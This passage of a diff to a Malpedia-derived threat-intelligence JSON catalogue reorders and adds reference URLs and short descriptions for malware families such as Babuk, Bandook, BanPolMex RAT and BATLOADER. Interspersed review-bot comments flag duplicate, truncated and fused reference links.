- "https://krebsonsecurity.com/2022/02/wazawaka-goes-waka-waka/",
- 
"https://www.bleepingcomputer.com/news/security/new-evil-corp-ransomware-mimics-payloadbin-gang-to-evade-us-sanctions/",
- "https://marcoramilli.com/2021/07/05/babuk-ransomware-the-builder/",
- "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/is-there-really-such-a-thing-as-a-low-paid-ransomware-operator/",
- "https://medium.com/s2wlab/w1-jun-en-story-of-the-week-ransomware-on-the-darkweb-af491d33868b",
- "https://raw.githubusercontent.com/vc0RExor/Malware-Threat-Reports/main/Ransomware/Babuk/Babuk_Ransomware_EN_2021_05.pdf",
- "http://chuongdong.com/reverse%20engineering/2021/01/03/BabukRansomware/",
- "https://www.advintel.io/post/groove-vs-babuk-groove-ransom-manifesto-ramp-underground-platform-secret-inner-workings",
 "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-babuk-moving-to-vm-nix-systems.pdf",
- "https://raw.githubusercontent.com/antonioCoco/infosec-talks/main/InsomniHack_2022_Ransomware_Encryption_Internals.pdf",
- "https://www.fr.sogeti.com/globalassets/france/avis-dexperts--livres-blancs/cybersecchronicles_-_babuk.pdf",
+ "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/is-there-really-such-a-thing-as-a-low-paid-ransomware-operator/",
+ "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html",
+ "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/",
+ "https://blog.cyble.com/2022/05/06/rebranded-babuk-ransomware-in-action-darkangels-ransomware-performs-targeted-attack/",
+ "https://www.trendmicro.com/en_us/research/21/b/new-in-ransomware.html",
+ "https://blog.morphisec.com/babuk-ransomware-variant-major-attack",
+ "https://github.com/EmissarySpider/ransomware-descendants",
+ "https://www.zerofox.com/blog/babuk-ransomware-variant-delta-plus/",
+ 
"https://raw.githubusercontent.com/vc0RExor/Malware-Threat-Reports/main/Ransomware/Babuk/Babuk_Ransomware_EN_2021_05.pdf",
+ "https://medium.com/s2wlab/w1-jun-en-story-of-the-week-ransomware-on-the-darkweb-af491d33868b",
+ "https://mssplab.github.io/threat-hunting/2023/06/15/malware-analysis-babuk.html",
+ "https://lab52.io/blog/quick-review-of-babuk-ransomware-builder/",
+ "https://chuongdong.com/reverse%20engineering/2021/01/16/BabukRansomware-v3/",
+ "https://www.bleepingcomputer.com/news/security/babuk-ransomware-is-back-uses-new-version-on-corporate-networks/",
+ "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/",
+ "https://www.bleepingcomputer.com/news/security/new-evil-corp-ransomware-mimics-payloadbin-gang-to-evade-us-sanctions/",
+ "https://twitter.com/Sebdraven/status/1346377590525845504",
+ "https://krebsonsecurity.com/2023/05/russian-hacker-wazawaka-indicted-for-ransomware/",
+ "https://medium.com/s2wlab/grooves-thoughts-on-blackmatter-babuk-and-interruption-in-the-supply-of-cheese-in-the-b5328bc764f2",
+ "https://securelist.com/ransomware-world-in-2021/102169/",
+ "https://sekurak.pl/udalo-nam-sie-zrealizowac-wywiad-z-grupa-ransomware-babuk-ktora-zaszyfrowala-policje-metropolitarna-w-waszyngtonie/",
+ "https://blog.talosintelligence.com/2021/11/babuk-exploits-exchange.html",
+ "https://twitter.com/GossiTheDog/status/1409117153182224386",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus/IOCs-blog-Ransomware%20Actor%20Abuses%20Genshin%20Impact%20Anti-Cheat%20Driver%20to%20Kill%20Antivirus.txt",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
+ "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-babuk-ransomware.pdf",
+ 
"https://ke-la.com/new-russian-speaking-forum-a-new-place-for-raas/",
+ "https://marcoramilli.com/2021/07/05/babuk-ransomware-the-builder/",
+ "https://medium.com/s2wlab/blackmatter-x-babuk-using-the-same-web-server-for-sharing-leaked-files-d01c20a74751",
+ "https://medium.com/s2wlab/groove-x-ramp-the-relation-between-groove-babuk-ramp-and-blackmatter-f75644f8f92d",
+ "https://killingthebear.jorgetesta.tech/actors/evil-corp",
+ "https://krebsonsecurity.com/2022/02/wazawaka-goes-waka-waka/",
+ "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
 "https://www.bleepingcomputer.com/news/security/babyk-ransomware-wont-hit-charities-unless-they-support-lgbt-blm/",
- "https://chuongdong.com/reverse%20engineering/2021/01/16/BabukRansomware-v3/"
+ "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf",
+ "http://chuongdong.com/reverse%20engineering/2021/01/03/BabukRansomware/",
+ "https://therecord.media/builder-for-babuk-locker-ransomware-leaked-online/",
+ "https://www.bleepingcomputer.com/news/security/data-leak-marketplaces-aim-to-take-over-the-extortion-economy/",
+ "https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html",
+ "https://medium.com/s2wlab/w4-may-en-story-of-the-week-ransomware-on-the-darkweb-5f5b8d4c3b6f",
+ "https://www.advintel.io/post/groove-vs-babuk-groove-ransom-manifesto-ramp-underground-platform-secret-inner-workings",
+ "https://www.databreaches.net/babuk-re-organizes-as-payload-bin-offers-its-first-leak/",
+ "https://sebdraven.medium.com/babuk-is-distributed-packed-78e2f5dd2e62",
+ "https://medium.com/s2wlab/w4-jan-en-story-of-the-week-ransomware-on-the-darkweb-7595544363b1",
+ "https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/",
+ "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/",
+ 
"https://www.bleepingcomputer.com/news/security/leaked-babuk-locker-ransomware-builder-used-in-new-attacks/",
+ "https://www.fr.sogeti.com/globalassets/france/avis-dexperts--livres-blancs/cybersecchronicles_-_babuk.pdf",
+ "https://raw.githubusercontent.com/antonioCoco/infosec-talks/main/InsomniHack_2022_Ransomware_Encryption_Internals.pdf"
 ],
 "synonyms": [
 "Babyk",
@@ -14236,11 +14892,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.babymetal",
- "https://www.mandiant.com/resources/evolution-of-fin7",
+ "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html",
 "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
 "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
- "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html",
- "https://www.infosecurityeurope.com/__novadocuments/367989?v=636338290033030000"
+ "https://www.infosecurityeurope.com/__novadocuments/367989?v=636338290033030000",
+ "https://www.mandiant.com/resources/evolution-of-fin7"
 ],
 "synonyms": [],
 "type": []
@@ -14253,24 +14909,24 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.babyshark",
+ "https://www.youtube.com/watch?v=Dv2_DK3tRgI",
+ "https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite",
+ "https://conference.hitb.org/hitbsecconf2021ams/materials/D2T1%20-%20The%20Phishermen%20-%20Dissecting%20Phishing%20Techniques%20of%20CloudDragon%20APT%20-%20Linda%20Kuo%20&Zih-Cing%20Liao%20.pdf",
+ "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf",
+ "https://blog.alyac.co.kr/3352",
+ "https://www.huntress.com/blog/targeted-apt-activity-babyshark-is-out-for-blood",
+ "https://www.pwc.co.uk/issues/cyber-security-services/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.html",
+ "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
 "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries",
 "https://twitter.com/i/web/status/1099147896950185985",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-301a",
 "https://www.bloomberglaw.com/document/public/subdoc/X67FPNDOUBV9VOPS35A4864BFIU?imagename=1",
 "https://www.sentinelone.com/labs/kimsuky-evolves-reconnaissance-capabilities-in-new-global-campaign/",
 "https://www.youtube.com/watch?v=rfzmHjZX70s",
- "https://blog.alyac.co.kr/3352",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite",
- "https://www.huntress.com/blog/targeted-apt-activity-babyshark-is-out-for-blood",
- "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf",
- 
"https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html",
- "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-301a",
 "https://www.pwc.co.uk/issues/cyber-security-services/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.htmlhttps://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html",
- "https://www.pwc.co.uk/issues/cyber-security-services/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.html",
- "https://conference.hitb.org/hitbsecconf2021ams/materials/D2T1%20-%20The%20Phishermen%20-%20Dissecting%20Phishing%20Techniques%20of%20CloudDragon%20APT%20-%20Linda%20Kuo%20&Zih-Cing%20Liao%20.pdf",
- "https://blog.google/threat-analysis-group/how-were-protecting-users-from-government-backed-attacks-from-north-korea/",
- "https://www.youtube.com/watch?v=Dv2_DK3tRgI"
+ "https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html",
+ "https://blog.google/threat-analysis-group/how-were-protecting-users-from-government-backed-attacks-from-north-korea/"
 ],
 "synonyms": [
 "LATEOP"
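Review bot: The unchanged context line between the removed `aa20-301a` entry and the removed `part-1.html` entry holds two URLs fused into a single string (`...part-1.htmlhttps://www.pwc.co.uk/...part-2.html`), and it survives on the new side even though both constituent URLs are now listed separately in the same `refs` array. That value is not a resolvable reference, so any consumer that dereferences or deduplicates refs will carry an invalid third entry; the line should simply be dropped. Since this cluster is regenerated from Malpedia, the durable fix is likely upstream or in the sync script (for example, rejecting a ref that contains more than one `://`), otherwise the next regeneration will reintroduce it.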
@@ -14351,10 +15007,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.backspace",
- "https://www.secureworks.com/research/threat-profiles/bronze-geneva",
- "https://www.mandiant.com/sites/default/files/2021-09/rpt-apt30.pdf",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/eagle-eye-is-back-apt30/",
 "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/eagle-eye-is-back-apt30/"
+ "https://www.mandiant.com/sites/default/files/2021-09/rpt-apt30.pdf",
+ "https://www.secureworks.com/research/threat-profiles/bronze-geneva"
 ],
 "synonyms": [
 "Lecna",
@@ -14370,15 +15026,15 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.backswap",
- "https://research.checkpoint.com/the-evolution-of-backswap/",
- "https://securityintelligence.com/backswap-malware-now-targets-six-banks-in-spain/",
- "https://www.fintechsecurity.com.hk/slides/01.Dmitry-Annual-Group-IB-report-High-Tech-Crime-Trends.pdf",
- "https://www.welivesecurity.com/2018/05/25/backswap-malware-empty-bank-accounts/",
- "https://www.f5.com/labs/articles/threat-intelligence/backswap-defrauds-online-banking-customers-using-hidden-input-fi",
- "https://explore.group-ib.com/htct/hi-tech_crime_2018",
 "https://www.cyberbit.com/blog/endpoint-security/backswap-banker-malware-hides-inside-replicas-of-legitimate-programs/",
+ "https://www.f5.com/labs/articles/threat-intelligence/backswap-defrauds-online-banking-customers-using-hidden-input-fi",
+ "https://www.fintechsecurity.com.hk/slides/01.Dmitry-Annual-Group-IB-report-High-Tech-Crime-Trends.pdf",
+ "https://securityintelligence.com/backswap-malware-now-targets-six-banks-in-spain/",
+ "https://explore.group-ib.com/htct/hi-tech_crime_2018",
+ "https://research.checkpoint.com/the-evolution-of-backswap/",
 "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
 "https://www.cert.pl/en/news/single/backswap-malware-analysis/",
+ "https://www.welivesecurity.com/2018/05/25/backswap-malware-empty-bank-accounts/",
 "https://www.cyberbit.com/backswap-banker-malware-hides-inside-replicas-of-legitimate-programs/"
 ],
 "synonyms": [],
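Review bot: The re-added F5 ref `https://www.f5.com/labs/articles/threat-intelligence/backswap-defrauds-online-banking-customers-using-hidden-input-fi` looks truncated (the slug ends mid-word), so it is probably a dead link that the reorder carries over unchanged. The two cyberbit entries in the same array (`/blog/endpoint-security/backswap-banker-...` and `/backswap-banker-...`) appear to be the same article under two paths; if that is confirmed, one of them is redundant. Both are inherited from the upstream source rather than introduced here, so the sync script is the place to validate ref URLs and collapse near-duplicates.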
@@ -14392,10 +15048,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.badcall",
+ "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDF",
+ "https://www.welivesecurity.com/2023/04/20/linux-malware-strengthens-links-lazarus-3cx-supply-chain-attack",
 "https://cocomelonc.github.io/tutorial/2021/09/04/simple-malware-av-evasion.html",
 "https://www.us-cert.gov/ncas/analysis-reports/ar19-252a",
- "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
- "https://www.welivesecurity.com/2023/04/20/linux-malware-strengthens-links-lazarus-3cx-supply-chain-attack"
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -14435,9 +15092,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.badhatch",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
 "https://team-cymru.com/blog/2021/03/15/fin8-badhatch-threat-indicator-enrichment/",
 "https://www.bitdefender.com/files/News/CaseStudies/study/394/Bitdefender-PR-Whitepaper-BADHATCH-creat5237-en-EN.pdf",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf"
+ "https://blog.gigamon.com/2019/07/23/abadbabe-8badf00d-discovering-badhatch-and-a-detailed-look-at-fin8s-tooling/"
 ],
 "synonyms": [],
 "type": []
@@ -14450,20 +15108,20 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.badnews",
- "https://cocomelonc.github.io/tutorial/2021/09/04/simple-malware-av-evasion.html",
- "https://blog.malwarebytes.com/threat-intelligence/2022/01/patchwork-apt-caught-in-its-own-web/",
- "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf",
- "https://ti.qianxin.com/blog/articles/analysis-of-the-attack-activities-of-patchwork-using-the-documents-of-relevant-government-agencies-in-pakistan-as-bait",
- "http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-1",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-LunghiHorejsi.pdf",
- "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf",
- "http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-2",
- "https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/",
- "https://ti.qianxin.com/blog/articles/apt-c-09-reappeared-as-conflict-intensified-between-india-and-pakistan/",
 "https://lab52.io/blog/new-patchwork-campaign-against-pakistan/",
+ "https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/",
+ "https://cocomelonc.github.io/tutorial/2021/09/04/simple-malware-av-evasion.html",
+ "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf",
+ "https://blog.malwarebytes.com/threat-intelligence/2022/01/patchwork-apt-caught-in-its-own-web/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
 "https://securelist.com/apt-trends-report-q1-2021/101967/",
- 
"https://www.forcepoint.com/blog/x-labs/monsoon-analysis-apt-campaign"
+ "https://ti.qianxin.com/blog/articles/apt-c-09-reappeared-as-conflict-intensified-between-india-and-pakistan/",
+ "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf",
+ "https://www.forcepoint.com/blog/x-labs/monsoon-analysis-apt-campaign",
+ "https://ti.qianxin.com/blog/articles/analysis-of-the-attack-activities-of-patchwork-using-the-documents-of-relevant-government-agencies-in-pakistan-as-bait",
+ "http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-2",
+ "http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-1",
+ "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-LunghiHorejsi.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -14504,10 +15162,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.baldr",
- "https://krabsonsecurity.com/2019/06/04/taking-a-look-at-baldr-stealer/",
 "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/baldr-vs-the-world.pdf",
 "https://www.youtube.com/watch?v=E2V4kB_gtcQ",
- "https://blog.malwarebytes.com/threat-analysis/2019/04/say-hello-baldr-new-stealer-market/"
+ "https://blog.malwarebytes.com/threat-analysis/2019/04/say-hello-baldr-new-stealer-market/",
+ "https://krabsonsecurity.com/2019/06/04/taking-a-look-at-baldr-stealer/"
 ],
 "synonyms": [
 "Baldir"
@@ -14548,8 +15206,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bamital",
- "https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/trojan-bamital-13-en.pdf",
- "https://blogs.microsoft.com/blog/2013/02/22/bamital-botnet-takedown-is-successful-cleanup-underway/"
+ "https://blogs.microsoft.com/blog/2013/02/22/bamital-botnet-takedown-is-successful-cleanup-underway/",
+ "https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/trojan-bamital-13-en.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -14584,20 +15242,37 @@
 "uuid": "a2ee2f24-ead8-4415-b777-7190478a620c",
 "value": "bancos"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bandit",
+ "https://www.cloudsek.com/blog/breaking-into-the-bandit-stealer-malware-infrastructure",
+ "https://www.zscaler.com/blogs/security-research/technical-analysis-bandit-stealer",
+ "https://www.trendmicro.com/en_in/research/23/e/new-info-stealer-bandit-stealer-targets-browsers-wallets.html",
+ "https://research.openanalysis.net/bandit/stealer/garble/go/obfuscation/2023/07/31/bandit-garble.html",
+ "https://research.openanalysis.net/garble/go/obfuscation/strings/2023/08/03/garble.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "53ef2273-0e62-4ad3-bcbc-d2cd72fc6108",
+ "value": "Bandit Stealer"
+ },
 {
 "description": "Bandook malware is a remote access trojan (RAT) first seen in 2007 and has been active for several years. Written in both Delphi and C++, it was first seen as a commercial RAT developed by a Lebanese creator named PrinceAli. 
Over the years, several variants of Bandook were leaked online, and the malware became available for public download.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bandook",
- "https://www.proofpoint.com/us/blog/threat-insight/new-threat-actor-uses-spanish-language-lures-distribute-seldom-observed-bandook",
- "https://www.welivesecurity.com/2021/07/07/bandidos-at-large-spying-campaign-latin-america/",
- "https://research.checkpoint.com/2020/bandook-signed-delivered/",
- "https://research.checkpoint.com/2020/bandook-signed-delivered",
- "https://www.eff.org/deeplinks/2020/12/dark-caracal-you-missed-spot",
- "https://www.eff.org/deeplinks/2023/02/uncle-sow-dark-caracal-latin-america",
 "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf",
- "https://twitter.com/malwrhunterteam/status/796425285197561856",
- "https://www.eff.org/files/2018/01/29/operation-manul.pdf"
+ "https://www.eff.org/deeplinks/2023/02/uncle-sow-dark-caracal-latin-america",
+ "https://www.eff.org/files/2018/01/29/operation-manul.pdf",
+ "https://www.welivesecurity.com/2021/07/07/bandidos-at-large-spying-campaign-latin-america/",
+ "https://www.proofpoint.com/us/blog/threat-insight/new-threat-actor-uses-spanish-language-lures-distribute-seldom-observed-bandook",
+ "https://research.checkpoint.com/2020/bandook-signed-delivered",
+ "https://research.checkpoint.com/2020/bandook-signed-delivered/",
+ "https://www.eff.org/deeplinks/2020/12/dark-caracal-you-missed-spot",
+ "https://twitter.com/malwrhunterteam/status/796425285197561856"
 ],
 "synonyms": [
 "Bandok"
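Review bot: The reordered Bandook `refs` array still lists the same Check Point post twice, `https://research.checkpoint.com/2020/bandook-signed-delivered` and the same path with a trailing slash; the duplicate pre-dates this commit but is re-emitted by it. Deduplicating on a normalized form (trailing slash stripped, scheme and host lower-cased) in the generator would drop this pair and any similar ones elsewhere in the file. The new `Bandit Stealer` entry at the top of the same hunk is added with `"description": ""`; that matches other entries in this file, so it is presumably the convention for sources without text, but an explicit note in the generator about why empty descriptions are kept rather than omitted would make that intent visible. The enclosing array continues outside the hunk.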
@@ -14625,10 +15300,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.banjori",
- "https://www.johannesbader.ch/2015/02/the-dga-of-banjori/",
 "http://blog.kleissner.org/?p=192",
 "http://blog.kleissner.org/?p=69",
- "http://osint.bambenekconsulting.com/feeds/"
+ "http://osint.bambenekconsulting.com/feeds/",
+ "https://www.johannesbader.ch/2015/02/the-dga-of-banjori/"
 ],
 "synonyms": [
 "BackPatcher",
@@ -14645,17 +15320,19 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bankshot",
- "https://malverse.it/analisi-bankshot-copperhedge",
- "https://blog.reversinglabs.com/blog/hidden-cobra",
- "https://www.us-cert.gov/ncas/analysis-reports/ar20-133a",
- "https://securelist.com/the-lazarus-group-deathnote-campaign/109490/",
- "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-108A-TraderTraitor-North_Korea_APT_Targets_Blockchain_Companies.pdf",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-232a",
- "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-108a",
 "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDF",
+ "https://www.us-cert.gov/ncas/analysis-reports/ar20-133a",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-232a",
+ "https://blog.reversinglabs.com/blog/hidden-cobra",
 "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://www.secureworks.com/research/threat-profiles/nickel-gladstone"
+ "https://malverse.it/analisi-bankshot-copperhedge",
+ "https://www.secureworks.com/research/threat-profiles/nickel-gladstone",
+ "https://www.virusbulletin.com/uploads/pdf/magazine/2018/VB2018-Kalnai-Poslusny.pdf",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-108a",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-108A-TraderTraitor-North_Korea_APT_Targets_Blockchain_Companies.pdf",
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
+ "https://vblocalhost.com/uploads/VB2021-Park.pdf",
+ "https://securelist.com/the-lazarus-group-deathnote-campaign/109490/"
 ],
 "synonyms": [
 "COPPERHEDGE"
@@ -14665,6 +15342,20 @@
 "uuid": "bc67677c-c0e7-4fb1-8619-7f43fa3ff886",
 "value": "Bankshot"
 },
+ {
+ "description": "BanPolMex is a remote access trojan that uses TCP for communication.\r\n\r\nIt uses an RC4-like stream cipher called Spritz for encryption of its configuration and network traffic.\r\n\r\nIt sends detailed information about the victim's environment, like computer name, Windows version, free space of memory and all drives, processor identifier and architecture, system locale, system metrics, manufacturer, and network configuration.\r\n\r\nIt supports almost 30 commands that include operations on the victim\u2019s filesystem, basic process management, file exfiltration, and the download and execution of additional tools from the attacker\u2019s C&C server. As in many RATs from Lazarus arsenal, the commands are indexed by 32-bit integers. However, in this case the indicis are convertible into a meaningful ASCII representation, that even suggests the functionality: SLEP, HIBN, DRIV, DIR, DIRP, CHDR, RUN, RUNX, DEL, WIPE, MOVE, FTIM, NEWF, DOWN, ZDWN, UPLD, PVEW, PKIL, CMDL, DIE, GCFG, SCFG, TCON, PEEX, PEIN.\r\n\r\nIt has aclui.dll as the internal DLL name. It contains statically linked code from open-source libraries like libcurl (version 7.47.1) or zLib (version 0.15).\r\n\r\nBanPolMex RAT was delivered for victims of a watering hole campaign targeting employees of Polish and Mexican banks, that was discovered in February 2017. It is usually loaded by HOTWAX.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.banpolmex",
+ "https://www.virusbulletin.com/uploads/pdf/magazine/2018/VB2018-Kalnai-Poslusny.pdf",
+ "https://www.welivesecurity.com/2017/02/16/demystifying-targeted-malware-used-polish-banks/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "95d699dc-d19e-47a7-9d38-fef5008ce891",
+ "value": "BanPolMex RAT"
+ },
 {
 "description": "",
 "meta": {
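Review bot: The new `BanPolMex RAT` description is the only one in these hunks that carries `\r\n\r\n` paragraph breaks; the other descriptions added or changed here (Babadeda, Bandook, BATLOADER) are single-paragraph strings, so consumers rendering this field will see inconsistent line endings. Normalizing CRLF to `\n` (or collapsing to spaces) when the generator imports upstream text would keep the field uniform. The same string has the typo `indicis`, which should read `indices`; both points are inherited from the source text rather than introduced by this commit.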
@@ -14709,8 +15400,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bart",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
 "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
 "https://intel471.com/blog/a-brief-history-of-ta505",
 "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf"
 ],
@@ -14748,19 +15439,22 @@
 "value": "Batel"
 },
 {
- "description": "",
+ "description": "According to PCrisk, BATLOADER is part of the infection chain where it is used to perform the initial compromise. This malware is used to execute payloads like Ursnif. Our team has discovered BATLOADER after executing installers for legitimate software (such as Zoom, TeamViewer Visual Studio) bundled with this malware. We have found those installers on compromised websites.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bat_loader",
- "https://insight-jp.nttsecurity.com/post/102i7af/steelclovergoogle",
- "https://medium.com/walmartglobaltech/revisiting-batloader-c2-structure-52f46ff9893a",
- "https://www.esentire.com/blog/batloader-continues-to-abuse-google-search-ads-to-deliver-vidar-stealer-and-ursnif",
+ "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html",
 "https://www.trendmicro.com/en_us/research/23/a/batloader-malware-abuses-legitimate-tools-uses-obfuscated-javasc.html",
- "https://www.mandiant.com/resources/seo-poisoning-batloader-atera",
- "https://www.kroll.com/en/insights/publications/cyber/hive-ransomware-technical-analysis-initial-access-discovery",
- "https://intel471.com/blog/malvertising-surges-to-distribute-malware",
+ "https://insight-jp.nttsecurity.com/post/102i7af/steelclovergoogle",
 "https://medium.com/walmartglobaltech/signed-dll-campaigns-as-a-service-7760ac676489",
- "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html"
+ "https://www.esentire.com/blog/batloader-continues-to-abuse-google-search-ads-to-deliver-vidar-stealer-and-ursnif",
+ "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader",
+ "https://www.kroll.com/en/insights/publications/cyber/hive-ransomware-technical-analysis-initial-access-discovery",
+ "https://www.trendmicro.com/en_us/research/23/h/batloader-campaigns-use-pyarmor-pro-for-evasion.html",
+ 
"https://www.esentire.com/blog/batloader-continues-signed-msix-app-package-abuse",
+ "https://medium.com/walmartglobaltech/revisiting-batloader-c2-structure-52f46ff9893a",
